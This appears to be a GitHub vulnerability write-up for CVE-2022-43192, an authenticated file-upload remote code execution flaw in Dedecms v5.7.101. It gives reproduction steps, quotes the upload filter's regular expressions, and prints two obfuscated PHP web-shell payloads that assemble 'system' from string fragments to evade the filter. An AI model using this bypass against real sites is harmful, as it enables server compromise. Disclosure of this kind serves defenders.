CVE-2022-43192: GitHub - linchuzhu/Dedecms-v5.7.101-RCE

Dedecms-v5.7.101-RCE****Vulnerability Description

Since CVE-2022-40886 is not fully fixed, Dedecms still has a file upload vulnerability, leading to RCE.

Vulnerability to reproduce

Log in to the backend of the website.

Upload the file hhh.php, the content of the file is as follows:

<?php $x=’sys’;$xx=’tem’;$xxx=$x.$xx;$y=’di’;$yy=’r’;$yyy=$y.$yy;$xxx($yyy) ?>

Visit hhh.php：

Vulnerability Analysis

In /dede/file_manage_control.php, the content of the file we upload will first be checked by uploadsafe.inc.php.

In CVE-2022-40886, the POC uses $_COOKIE to bypass the $cfg_disable_funs parameter blacklist. It can be seen that in v5.7.101, uploads/include/uploadsafe.inc.php added the limit of $_COOKIE, and added some regular matching filtering.

Focus on the regular matching expression added by uploadsafe.inc.php.

if(preg_match(“#<\?(php|=)#i", " {$content}”) == TRUE) { if(preg_match(“#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", " {$content}”) == TRUE) { $content = dede_htmlspecialchars($content); die(“DedeCMS提示：当前上传的文件中存在木马！<pre>{$content}</pre>”); } if(preg_match(“#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", " {$content}”) == TRUE) { $content = dede_htmlspecialchars($content); die(“DedeCMS提示：当前上传的文件中存在木马！<pre>{$content}</pre>”); } if(preg_match(“#[`][\s\S]*[`]#i", " {$content}”) == TRUE) { $content = dede_htmlspecialchars($content); die(“DedeCMS提示：当前上传的文件中存在后门！<pre>{$content}</pre>”); } }

Among them, there is the following regular expression, if the match is successful, the process will be terminated and returned DedeCMS提示：当前上传的文件中存在木马。

[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]

This regular expression prevents a lot of malicious code, but it needs to meet the requirements ending with ;, and shell injection can still be performed through <?php ?>.

<?php $x=’sys’;$xx=’tem’;$xxx=$x.$xx;$y=’ca’;$yy=’lc’;$yyy=$y.$yy;$xxx($yyy) ?>